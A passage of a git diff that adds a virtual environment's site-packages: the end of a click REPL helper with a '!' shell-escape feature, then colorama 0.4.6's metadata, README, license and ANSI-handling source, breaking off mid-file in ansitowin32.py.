help information" +) + + +def _execute_internal_and_sys_cmds( + command, + allow_internal_commands=True, + allow_system_commands=True, +): + """ + Executes internal, system, and all the other registered click commands from the input + """ + if allow_system_commands and dispatch_repl_commands(command): + return None + + if allow_internal_commands: + result = handle_internal_commands(command) + if isinstance(result, str): + click.echo(result) + return None + + try: + return split_arg_string(command) + except ValueError as e: + raise CommandLineParserError("{}".format(e)) + + +def exit(): + """Exit the repl""" + _exit_internal() + + +def dispatch_repl_commands(command): + """ + Execute system commands entered in the repl. + + System commands are all commands starting with "!". + """ + if command.startswith("!"): + os.system(command[1:]) + return True + + return False + + +def handle_internal_commands(command): + """ + Run repl-internal commands. + + Repl-internal commands are all commands starting with ":". 
+ """ + if command.startswith(":"): + target = _get_registered_target(command[1:], default=None) + if target: + return target() diff --git a/env/Lib/site-packages/colorama-0.4.6.dist-info/INSTALLER b/env/Lib/site-packages/colorama-0.4.6.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/colorama-0.4.6.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/colorama-0.4.6.dist-info/METADATA b/env/Lib/site-packages/colorama-0.4.6.dist-info/METADATA new file mode 100644 index 00000000..a1b5c575 --- /dev/null +++ b/env/Lib/site-packages/colorama-0.4.6.dist-info/METADATA @@ -0,0 +1,441 @@ +Metadata-Version: 2.1 +Name: colorama +Version: 0.4.6 +Summary: Cross-platform colored terminal text. +Project-URL: Homepage, https://github.com/tartley/colorama +Author-email: Jonathan Hartley +License-File: LICENSE.txt +Keywords: ansi,color,colour,crossplatform,terminal,text,windows,xplatform +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Console +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 2 +Classifier: Programming Language :: Python :: 2.7 +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Terminals +Requires-Python: !=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7 +Description-Content-Type: text/x-rst + +.. image:: https://img.shields.io/pypi/v/colorama.svg + :target: https://pypi.org/project/colorama/ + :alt: Latest Version + +.. image:: https://img.shields.io/pypi/pyversions/colorama.svg + :target: https://pypi.org/project/colorama/ + :alt: Supported Python versions + +.. image:: https://github.com/tartley/colorama/actions/workflows/test.yml/badge.svg + :target: https://github.com/tartley/colorama/actions/workflows/test.yml + :alt: Build Status + +Colorama +======== + +Makes ANSI escape character sequences (for producing colored terminal text and +cursor positioning) work under MS Windows. + +.. |donate| image:: https://www.paypalobjects.com/en_US/i/btn/btn_donate_SM.gif + :target: https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=2MZ9D2GMLYCUJ&item_name=Colorama¤cy_code=USD + :alt: Donate with Paypal + +`PyPI for releases `_ | +`Github for source `_ | +`Colorama for enterprise on Tidelift `_ + +If you find Colorama useful, please |donate| to the authors. Thank you! + +Installation +------------ + +Tested on CPython 2.7, 3.7, 3.8, 3.9 and 3.10 and Pypy 2.7 and 3.8. + +No requirements other than the standard library. + +.. code-block:: bash + + pip install colorama + # or + conda install -c anaconda colorama + +Description +----------- + +ANSI escape character sequences have long been used to produce colored terminal +text and cursor positioning on Unix and Macs. Colorama makes this work on +Windows, too, by wrapping ``stdout``, stripping ANSI sequences it finds (which +would appear as gobbledygook in the output), and converting them into the +appropriate win32 calls to modify the state of the terminal. 
On other platforms, +Colorama does nothing. + +This has the upshot of providing a simple cross-platform API for printing +colored terminal text from Python, and has the happy side-effect that existing +applications or libraries which use ANSI sequences to produce colored output on +Linux or Macs can now also work on Windows, simply by calling +``colorama.just_fix_windows_console()`` (since v0.4.6) or ``colorama.init()`` +(all versions, but may have other side-effects – see below). + +An alternative approach is to install ``ansi.sys`` on Windows machines, which +provides the same behaviour for all applications running in terminals. Colorama +is intended for situations where that isn't easy (e.g., maybe your app doesn't +have an installer.) + +Demo scripts in the source code repository print some colored text using +ANSI sequences. Compare their output under Gnome-terminal's built in ANSI +handling, versus on Windows Command-Prompt using Colorama: + +.. image:: https://github.com/tartley/colorama/raw/master/screenshots/ubuntu-demo.png + :width: 661 + :height: 357 + :alt: ANSI sequences on Ubuntu under gnome-terminal. + +.. image:: https://github.com/tartley/colorama/raw/master/screenshots/windows-demo.png + :width: 668 + :height: 325 + :alt: Same ANSI sequences on Windows, using Colorama. + +These screenshots show that, on Windows, Colorama does not support ANSI 'dim +text'; it looks the same as 'normal text'. + +Usage +----- + +Initialisation +.............. + +If the only thing you want from Colorama is to get ANSI escapes to work on +Windows, then run: + +.. code-block:: python + + from colorama import just_fix_windows_console + just_fix_windows_console() + +If you're on a recent version of Windows 10 or better, and your stdout/stderr +are pointing to a Windows console, then this will flip the magic configuration +switch to enable Windows' built-in ANSI support. + +If you're on an older version of Windows, and your stdout/stderr are pointing to +a Windows console, then this will wrap ``sys.stdout`` and/or ``sys.stderr`` in a +magic file object that intercepts ANSI escape sequences and issues the +appropriate Win32 calls to emulate them. + +In all other circumstances, it does nothing whatsoever. Basically the idea is +that this makes Windows act like Unix with respect to ANSI escape handling. + +It's safe to call this function multiple times. It's safe to call this function +on non-Windows platforms, but it won't do anything. It's safe to call this +function when one or both of your stdout/stderr are redirected to a file – it +won't do anything to those streams. + +Alternatively, you can use the older interface with more features (but also more +potential footguns): + +.. code-block:: python + + from colorama import init + init() + +This does the same thing as ``just_fix_windows_console``, except for the +following differences: + +- It's not safe to call ``init`` multiple times; you can end up with multiple + layers of wrapping and broken ANSI support. + +- Colorama will apply a heuristic to guess whether stdout/stderr support ANSI, + and if it thinks they don't, then it will wrap ``sys.stdout`` and + ``sys.stderr`` in a magic file object that strips out ANSI escape sequences + before printing them. This happens on all platforms, and can be convenient if + you want to write your code to emit ANSI escape sequences unconditionally, and + let Colorama decide whether they should actually be output. But note that + Colorama's heuristic is not particularly clever. 
+ +- ``init`` also accepts explicit keyword args to enable/disable various + functionality – see below. + +To stop using Colorama before your program exits, simply call ``deinit()``. +This will restore ``stdout`` and ``stderr`` to their original values, so that +Colorama is disabled. To resume using Colorama again, call ``reinit()``; it is +cheaper than calling ``init()`` again (but does the same thing). + +Most users should depend on ``colorama >= 0.4.6``, and use +``just_fix_windows_console``. The old ``init`` interface will be supported +indefinitely for backwards compatibility, but we don't plan to fix any issues +with it, also for backwards compatibility. + +Colored Output +.............. + +Cross-platform printing of colored text can then be done using Colorama's +constant shorthand for ANSI escape sequences. These are deliberately +rudimentary, see below. + +.. code-block:: python + + from colorama import Fore, Back, Style + print(Fore.RED + 'some red text') + print(Back.GREEN + 'and with a green background') + print(Style.DIM + 'and in dim text') + print(Style.RESET_ALL) + print('back to normal now') + +...or simply by manually printing ANSI sequences from your own code: + +.. code-block:: python + + print('\033[31m' + 'some red text') + print('\033[39m') # and reset to default color + +...or, Colorama can be used in conjunction with existing ANSI libraries +such as the venerable `Termcolor `_ +the fabulous `Blessings `_, +or the incredible `_Rich `_. + +If you wish Colorama's Fore, Back and Style constants were more capable, +then consider using one of the above highly capable libraries to generate +colors, etc, and use Colorama just for its primary purpose: to convert +those ANSI sequences to also work on Windows: + +SIMILARLY, do not send PRs adding the generation of new ANSI types to Colorama. +We are only interested in converting ANSI codes to win32 API calls, not +shortcuts like the above to generate ANSI characters. + +.. code-block:: python + + from colorama import just_fix_windows_console + from termcolor import colored + + # use Colorama to make Termcolor work on Windows too + just_fix_windows_console() + + # then use Termcolor for all colored text output + print(colored('Hello, World!', 'green', 'on_red')) + +Available formatting constants are:: + + Fore: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET. + Back: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET. + Style: DIM, NORMAL, BRIGHT, RESET_ALL + +``Style.RESET_ALL`` resets foreground, background, and brightness. Colorama will +perform this reset automatically on program exit. + +These are fairly well supported, but not part of the standard:: + + Fore: LIGHTBLACK_EX, LIGHTRED_EX, LIGHTGREEN_EX, LIGHTYELLOW_EX, LIGHTBLUE_EX, LIGHTMAGENTA_EX, LIGHTCYAN_EX, LIGHTWHITE_EX + Back: LIGHTBLACK_EX, LIGHTRED_EX, LIGHTGREEN_EX, LIGHTYELLOW_EX, LIGHTBLUE_EX, LIGHTMAGENTA_EX, LIGHTCYAN_EX, LIGHTWHITE_EX + +Cursor Positioning +.................. + +ANSI codes to reposition the cursor are supported. See ``demos/demo06.py`` for +an example of how to generate them. + +Init Keyword Args +................. + +``init()`` accepts some ``**kwargs`` to override default behaviour. + +init(autoreset=False): + If you find yourself repeatedly sending reset sequences to turn off color + changes at the end of every print, then ``init(autoreset=True)`` will + automate that: + + .. 
code-block:: python + + from colorama import init + init(autoreset=True) + print(Fore.RED + 'some red text') + print('automatically back to default color again') + +init(strip=None): + Pass ``True`` or ``False`` to override whether ANSI codes should be + stripped from the output. The default behaviour is to strip if on Windows + or if output is redirected (not a tty). + +init(convert=None): + Pass ``True`` or ``False`` to override whether to convert ANSI codes in the + output into win32 calls. The default behaviour is to convert if on Windows + and output is to a tty (terminal). + +init(wrap=True): + On Windows, Colorama works by replacing ``sys.stdout`` and ``sys.stderr`` + with proxy objects, which override the ``.write()`` method to do their work. + If this wrapping causes you problems, then this can be disabled by passing + ``init(wrap=False)``. The default behaviour is to wrap if ``autoreset`` or + ``strip`` or ``convert`` are True. + + When wrapping is disabled, colored printing on non-Windows platforms will + continue to work as normal. To do cross-platform colored output, you can + use Colorama's ``AnsiToWin32`` proxy directly: + + .. code-block:: python + + import sys + from colorama import init, AnsiToWin32 + init(wrap=False) + stream = AnsiToWin32(sys.stderr).stream + + # Python 2 + print >>stream, Fore.BLUE + 'blue text on stderr' + + # Python 3 + print(Fore.BLUE + 'blue text on stderr', file=stream) + +Recognised ANSI Sequences +......................... + +ANSI sequences generally take the form:: + + ESC [ ; ... + +Where ```` is an integer, and ```` is a single letter. Zero or +more params are passed to a ````. If no params are passed, it is +generally synonymous with passing a single zero. No spaces exist in the +sequence; they have been inserted here simply to read more easily. + +The only ANSI sequences that Colorama converts into win32 calls are:: + + ESC [ 0 m # reset all (colors and brightness) + ESC [ 1 m # bright + ESC [ 2 m # dim (looks same as normal brightness) + ESC [ 22 m # normal brightness + + # FOREGROUND: + ESC [ 30 m # black + ESC [ 31 m # red + ESC [ 32 m # green + ESC [ 33 m # yellow + ESC [ 34 m # blue + ESC [ 35 m # magenta + ESC [ 36 m # cyan + ESC [ 37 m # white + ESC [ 39 m # reset + + # BACKGROUND + ESC [ 40 m # black + ESC [ 41 m # red + ESC [ 42 m # green + ESC [ 43 m # yellow + ESC [ 44 m # blue + ESC [ 45 m # magenta + ESC [ 46 m # cyan + ESC [ 47 m # white + ESC [ 49 m # reset + + # cursor positioning + ESC [ y;x H # position cursor at x across, y down + ESC [ y;x f # position cursor at x across, y down + ESC [ n A # move cursor n lines up + ESC [ n B # move cursor n lines down + ESC [ n C # move cursor n characters forward + ESC [ n D # move cursor n characters backward + + # clear the screen + ESC [ mode J # clear the screen + + # clear the line + ESC [ mode K # clear the line + +Multiple numeric params to the ``'m'`` command can be combined into a single +sequence:: + + ESC [ 36 ; 45 ; 1 m # bright cyan text on magenta background + +All other ANSI sequences of the form ``ESC [ ; ... `` +are silently stripped from the output on Windows. + +Any other form of ANSI sequence, such as single-character codes or alternative +initial characters, are not recognised or stripped. It would be cool to add +them though. Let me know if it would be useful for you, via the Issues on +GitHub. + +Status & Known Problems +----------------------- + +I've personally only tested it on Windows XP (CMD, Console2), Ubuntu +(gnome-terminal, xterm), and OS X. 
+ +Some valid ANSI sequences aren't recognised. + +If you're hacking on the code, see `README-hacking.md`_. ESPECIALLY, see the +explanation there of why we do not want PRs that allow Colorama to generate new +types of ANSI codes. + +See outstanding issues and wish-list: +https://github.com/tartley/colorama/issues + +If anything doesn't work for you, or doesn't do what you expected or hoped for, +I'd love to hear about it on that issues list, would be delighted by patches, +and would be happy to grant commit access to anyone who submits a working patch +or two. + +.. _README-hacking.md: README-hacking.md + +License +------- + +Copyright Jonathan Hartley & Arnon Yaari, 2013-2020. BSD 3-Clause license; see +LICENSE file. + +Professional support +-------------------- + +.. |tideliftlogo| image:: https://cdn2.hubspot.net/hubfs/4008838/website/logos/logos_for_download/Tidelift_primary-shorthand-logo.png + :alt: Tidelift + :target: https://tidelift.com/subscription/pkg/pypi-colorama?utm_source=pypi-colorama&utm_medium=referral&utm_campaign=readme + +.. list-table:: + :widths: 10 100 + + * - |tideliftlogo| + - Professional support for colorama is available as part of the + `Tidelift Subscription`_. + Tidelift gives software development teams a single source for purchasing + and maintaining their software, with professional grade assurances from + the experts who know it best, while seamlessly integrating with existing + tools. + +.. _Tidelift Subscription: https://tidelift.com/subscription/pkg/pypi-colorama?utm_source=pypi-colorama&utm_medium=referral&utm_campaign=readme + +Thanks +------ + +See the CHANGELOG for more thanks! + +* Marc Schlaich (schlamar) for a ``setup.py`` fix for Python2.5. +* Marc Abramowitz, reported & fixed a crash on exit with closed ``stdout``, + providing a solution to issue #7's setuptools/distutils debate, + and other fixes. +* User 'eryksun', for guidance on correctly instantiating ``ctypes.windll``. +* Matthew McCormick for politely pointing out a longstanding crash on non-Win. +* Ben Hoyt, for a magnificent fix under 64-bit Windows. +* Jesse at Empty Square for submitting a fix for examples in the README. +* User 'jamessp', an observant documentation fix for cursor positioning. +* User 'vaal1239', Dave Mckee & Lackner Kristof for a tiny but much-needed Win7 + fix. +* Julien Stuyck, for wisely suggesting Python3 compatible updates to README. +* Daniel Griffith for multiple fabulous patches. +* Oscar Lesta for a valuable fix to stop ANSI chars being sent to non-tty + output. +* Roger Binns, for many suggestions, valuable feedback, & bug reports. +* Tim Golden for thought and much appreciated feedback on the initial idea. +* User 'Zearin' for updates to the README file. +* John Szakmeister for adding support for light colors +* Charles Merriam for adding documentation to demos +* Jurko for a fix on 64-bit Windows CPython2.5 w/o ctypes +* Florian Bruhin for a fix when stdout or stderr are None +* Thomas Weininger for fixing ValueError on Windows +* Remi Rampin for better Github integration and fixes to the README file +* Simeon Visser for closing a file handle using 'with' and updating classifiers + to include Python 3.3 and 3.4 +* Andy Neff for fixing RESET of LIGHT_EX colors. +* Jonathan Hartley for the initial idea and implementation. 
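+
+Putting It Together
+-------------------
+
+The snippet below is an illustrative sketch (not taken from the upstream docs) that
+combines the pieces described above: it enables Windows ANSI handling, prints with the
+``Fore``, ``Back`` and ``Style`` shorthands, and repositions the cursor with ``Cursor``.
+
+.. code-block:: python
+
+    import sys
+    from colorama import just_fix_windows_console, Fore, Back, Style, Cursor
+
+    # Make ANSI sequences work on Windows consoles; a no-op elsewhere.
+    just_fix_windows_console()
+
+    # Colored output using the documented constants.
+    print(Fore.CYAN + 'cyan text' + Style.RESET_ALL)
+    print(Back.YELLOW + Fore.BLACK + 'black on yellow' + Style.RESET_ALL)
+
+    # Cursor positioning: move up one line and overwrite its start.
+    sys.stdout.write(Cursor.UP(1) + 'overwritten' + '\n')
+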
diff --git a/env/Lib/site-packages/colorama-0.4.6.dist-info/RECORD b/env/Lib/site-packages/colorama-0.4.6.dist-info/RECORD new file mode 100644 index 00000000..8c5f12de --- /dev/null +++ b/env/Lib/site-packages/colorama-0.4.6.dist-info/RECORD @@ -0,0 +1,31 @@ +colorama-0.4.6.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +colorama-0.4.6.dist-info/METADATA,sha256=e67SnrUMOym9sz_4TjF3vxvAV4T3aF7NyqRHHH3YEMw,17158 +colorama-0.4.6.dist-info/RECORD,, +colorama-0.4.6.dist-info/WHEEL,sha256=cdcF4Fbd0FPtw2EMIOwH-3rSOTUdTCeOSXRMD1iLUb8,105 +colorama-0.4.6.dist-info/licenses/LICENSE.txt,sha256=ysNcAmhuXQSlpxQL-zs25zrtSWZW6JEQLkKIhteTAxg,1491 +colorama/__init__.py,sha256=wePQA4U20tKgYARySLEC047ucNX-g8pRLpYBuiHlLb8,266 +colorama/__pycache__/__init__.cpython-310.pyc,, +colorama/__pycache__/ansi.cpython-310.pyc,, +colorama/__pycache__/ansitowin32.cpython-310.pyc,, +colorama/__pycache__/initialise.cpython-310.pyc,, +colorama/__pycache__/win32.cpython-310.pyc,, +colorama/__pycache__/winterm.cpython-310.pyc,, +colorama/ansi.py,sha256=Top4EeEuaQdBWdteKMEcGOTeKeF19Q-Wo_6_Cj5kOzQ,2522 +colorama/ansitowin32.py,sha256=vPNYa3OZbxjbuFyaVo0Tmhmy1FZ1lKMWCnT7odXpItk,11128 +colorama/initialise.py,sha256=-hIny86ClXo39ixh5iSCfUIa2f_h_bgKRDW7gqs-KLU,3325 +colorama/tests/__init__.py,sha256=MkgPAEzGQd-Rq0w0PZXSX2LadRWhUECcisJY8lSrm4Q,75 +colorama/tests/__pycache__/__init__.cpython-310.pyc,, +colorama/tests/__pycache__/ansi_test.cpython-310.pyc,, +colorama/tests/__pycache__/ansitowin32_test.cpython-310.pyc,, +colorama/tests/__pycache__/initialise_test.cpython-310.pyc,, +colorama/tests/__pycache__/isatty_test.cpython-310.pyc,, +colorama/tests/__pycache__/utils.cpython-310.pyc,, +colorama/tests/__pycache__/winterm_test.cpython-310.pyc,, +colorama/tests/ansi_test.py,sha256=FeViDrUINIZcr505PAxvU4AjXz1asEiALs9GXMhwRaE,2839 +colorama/tests/ansitowin32_test.py,sha256=RN7AIhMJ5EqDsYaCjVo-o4u8JzDD4ukJbmevWKS70rY,10678 +colorama/tests/initialise_test.py,sha256=BbPy-XfyHwJ6zKozuQOvNvQZzsx9vdb_0bYXn7hsBTc,6741 +colorama/tests/isatty_test.py,sha256=Pg26LRpv0yQDB5Ac-sxgVXG7hsA1NYvapFgApZfYzZg,1866 +colorama/tests/utils.py,sha256=1IIRylG39z5-dzq09R_ngufxyPZxgldNbrxKxUGwGKE,1079 +colorama/tests/winterm_test.py,sha256=qoWFPEjym5gm2RuMwpf3pOis3a5r_PJZFCzK254JL8A,3709 +colorama/win32.py,sha256=YQOKwMTwtGBbsY4dL5HYTvwTeP9wIQra5MvPNddpxZs,6181 +colorama/winterm.py,sha256=XCQFDHjPi6AHYNdZwy0tA02H-Jh48Jp-HvCjeLeLp3U,7134 diff --git a/env/Lib/site-packages/colorama-0.4.6.dist-info/WHEEL b/env/Lib/site-packages/colorama-0.4.6.dist-info/WHEEL new file mode 100644 index 00000000..d79189fd --- /dev/null +++ b/env/Lib/site-packages/colorama-0.4.6.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: hatchling 1.11.1 +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any diff --git a/env/Lib/site-packages/colorama-0.4.6.dist-info/licenses/LICENSE.txt b/env/Lib/site-packages/colorama-0.4.6.dist-info/licenses/LICENSE.txt new file mode 100644 index 00000000..3105888e --- /dev/null +++ b/env/Lib/site-packages/colorama-0.4.6.dist-info/licenses/LICENSE.txt @@ -0,0 +1,27 @@ +Copyright (c) 2010 Jonathan Hartley +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +* Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. 
+ +* Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +* Neither the name of the copyright holders, nor those of its contributors + may be used to endorse or promote products derived from this software without + specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/env/Lib/site-packages/colorama/__init__.py b/env/Lib/site-packages/colorama/__init__.py new file mode 100644 index 00000000..383101cd --- /dev/null +++ b/env/Lib/site-packages/colorama/__init__.py @@ -0,0 +1,7 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +from .initialise import init, deinit, reinit, colorama_text, just_fix_windows_console +from .ansi import Fore, Back, Style, Cursor +from .ansitowin32 import AnsiToWin32 + +__version__ = '0.4.6' + diff --git a/env/Lib/site-packages/colorama/ansi.py b/env/Lib/site-packages/colorama/ansi.py new file mode 100644 index 00000000..11ec695f --- /dev/null +++ b/env/Lib/site-packages/colorama/ansi.py @@ -0,0 +1,102 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +''' +This module generates ANSI character codes to printing colors to terminals. +See: http://en.wikipedia.org/wiki/ANSI_escape_code +''' + +CSI = '\033[' +OSC = '\033]' +BEL = '\a' + + +def code_to_chars(code): + return CSI + str(code) + 'm' + +def set_title(title): + return OSC + '2;' + title + BEL + +def clear_screen(mode=2): + return CSI + str(mode) + 'J' + +def clear_line(mode=2): + return CSI + str(mode) + 'K' + + +class AnsiCodes(object): + def __init__(self): + # the subclasses declare class attributes which are numbers. + # Upon instantiation we define instance attributes, which are the same + # as the class attributes but wrapped with the ANSI escape sequence + for name in dir(self): + if not name.startswith('_'): + value = getattr(self, name) + setattr(self, name, code_to_chars(value)) + + +class AnsiCursor(object): + def UP(self, n=1): + return CSI + str(n) + 'A' + def DOWN(self, n=1): + return CSI + str(n) + 'B' + def FORWARD(self, n=1): + return CSI + str(n) + 'C' + def BACK(self, n=1): + return CSI + str(n) + 'D' + def POS(self, x=1, y=1): + return CSI + str(y) + ';' + str(x) + 'H' + + +class AnsiFore(AnsiCodes): + BLACK = 30 + RED = 31 + GREEN = 32 + YELLOW = 33 + BLUE = 34 + MAGENTA = 35 + CYAN = 36 + WHITE = 37 + RESET = 39 + + # These are fairly well supported, but not part of the standard. 
+ LIGHTBLACK_EX = 90 + LIGHTRED_EX = 91 + LIGHTGREEN_EX = 92 + LIGHTYELLOW_EX = 93 + LIGHTBLUE_EX = 94 + LIGHTMAGENTA_EX = 95 + LIGHTCYAN_EX = 96 + LIGHTWHITE_EX = 97 + + +class AnsiBack(AnsiCodes): + BLACK = 40 + RED = 41 + GREEN = 42 + YELLOW = 43 + BLUE = 44 + MAGENTA = 45 + CYAN = 46 + WHITE = 47 + RESET = 49 + + # These are fairly well supported, but not part of the standard. + LIGHTBLACK_EX = 100 + LIGHTRED_EX = 101 + LIGHTGREEN_EX = 102 + LIGHTYELLOW_EX = 103 + LIGHTBLUE_EX = 104 + LIGHTMAGENTA_EX = 105 + LIGHTCYAN_EX = 106 + LIGHTWHITE_EX = 107 + + +class AnsiStyle(AnsiCodes): + BRIGHT = 1 + DIM = 2 + NORMAL = 22 + RESET_ALL = 0 + +Fore = AnsiFore() +Back = AnsiBack() +Style = AnsiStyle() +Cursor = AnsiCursor() diff --git a/env/Lib/site-packages/colorama/ansitowin32.py b/env/Lib/site-packages/colorama/ansitowin32.py new file mode 100644 index 00000000..abf209e6 --- /dev/null +++ b/env/Lib/site-packages/colorama/ansitowin32.py @@ -0,0 +1,277 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import re +import sys +import os + +from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style, BEL +from .winterm import enable_vt_processing, WinTerm, WinColor, WinStyle +from .win32 import windll, winapi_test + + +winterm = None +if windll is not None: + winterm = WinTerm() + + +class StreamWrapper(object): + ''' + Wraps a stream (such as stdout), acting as a transparent proxy for all + attribute access apart from method 'write()', which is delegated to our + Converter instance. + ''' + def __init__(self, wrapped, converter): + # double-underscore everything to prevent clashes with names of + # attributes on the wrapped stream object. + self.__wrapped = wrapped + self.__convertor = converter + + def __getattr__(self, name): + return getattr(self.__wrapped, name) + + def __enter__(self, *args, **kwargs): + # special method lookup bypasses __getattr__/__getattribute__, see + # https://stackoverflow.com/questions/12632894/why-doesnt-getattr-work-with-exit + # thus, contextlib magic methods are not proxied via __getattr__ + return self.__wrapped.__enter__(*args, **kwargs) + + def __exit__(self, *args, **kwargs): + return self.__wrapped.__exit__(*args, **kwargs) + + def __setstate__(self, state): + self.__dict__ = state + + def __getstate__(self): + return self.__dict__ + + def write(self, text): + self.__convertor.write(text) + + def isatty(self): + stream = self.__wrapped + if 'PYCHARM_HOSTED' in os.environ: + if stream is not None and (stream is sys.__stdout__ or stream is sys.__stderr__): + return True + try: + stream_isatty = stream.isatty + except AttributeError: + return False + else: + return stream_isatty() + + @property + def closed(self): + stream = self.__wrapped + try: + return stream.closed + # AttributeError in the case that the stream doesn't support being closed + # ValueError for the case that the stream has already been detached when atexit runs + except (AttributeError, ValueError): + return True + + +class AnsiToWin32(object): + ''' + Implements a 'write()' method which, on Windows, will strip ANSI character + sequences from the text, and if outputting to a tty, will convert them into + win32 function calls. 
+ ''' + ANSI_CSI_RE = re.compile('\001?\033\\[((?:\\d|;)*)([a-zA-Z])\002?') # Control Sequence Introducer + ANSI_OSC_RE = re.compile('\001?\033\\]([^\a]*)(\a)\002?') # Operating System Command + + def __init__(self, wrapped, convert=None, strip=None, autoreset=False): + # The wrapped stream (normally sys.stdout or sys.stderr) + self.wrapped = wrapped + + # should we reset colors to defaults after every .write() + self.autoreset = autoreset + + # create the proxy wrapping our output stream + self.stream = StreamWrapper(wrapped, self) + + on_windows = os.name == 'nt' + # We test if the WinAPI works, because even if we are on Windows + # we may be using a terminal that doesn't support the WinAPI + # (e.g. Cygwin Terminal). In this case it's up to the terminal + # to support the ANSI codes. + conversion_supported = on_windows and winapi_test() + try: + fd = wrapped.fileno() + except Exception: + fd = -1 + system_has_native_ansi = not on_windows or enable_vt_processing(fd) + have_tty = not self.stream.closed and self.stream.isatty() + need_conversion = conversion_supported and not system_has_native_ansi + + # should we strip ANSI sequences from our output? + if strip is None: + strip = need_conversion or not have_tty + self.strip = strip + + # should we should convert ANSI sequences into win32 calls? + if convert is None: + convert = need_conversion and have_tty + self.convert = convert + + # dict of ansi codes to win32 functions and parameters + self.win32_calls = self.get_win32_calls() + + # are we wrapping stderr? + self.on_stderr = self.wrapped is sys.stderr + + def should_wrap(self): + ''' + True if this class is actually needed. If false, then the output + stream will not be affected, nor will win32 calls be issued, so + wrapping stdout is not actually required. 
This will generally be + False on non-Windows platforms, unless optional functionality like + autoreset has been requested using kwargs to init() + ''' + return self.convert or self.strip or self.autoreset + + def get_win32_calls(self): + if self.convert and winterm: + return { + AnsiStyle.RESET_ALL: (winterm.reset_all, ), + AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT), + AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL), + AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL), + AnsiFore.BLACK: (winterm.fore, WinColor.BLACK), + AnsiFore.RED: (winterm.fore, WinColor.RED), + AnsiFore.GREEN: (winterm.fore, WinColor.GREEN), + AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW), + AnsiFore.BLUE: (winterm.fore, WinColor.BLUE), + AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA), + AnsiFore.CYAN: (winterm.fore, WinColor.CYAN), + AnsiFore.WHITE: (winterm.fore, WinColor.GREY), + AnsiFore.RESET: (winterm.fore, ), + AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True), + AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True), + AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True), + AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True), + AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True), + AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True), + AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True), + AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True), + AnsiBack.BLACK: (winterm.back, WinColor.BLACK), + AnsiBack.RED: (winterm.back, WinColor.RED), + AnsiBack.GREEN: (winterm.back, WinColor.GREEN), + AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW), + AnsiBack.BLUE: (winterm.back, WinColor.BLUE), + AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA), + AnsiBack.CYAN: (winterm.back, WinColor.CYAN), + AnsiBack.WHITE: (winterm.back, WinColor.GREY), + AnsiBack.RESET: (winterm.back, ), + AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True), + AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True), + AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True), + AnsiBack.LIGHTYELLOW_EX: (winterm.back, 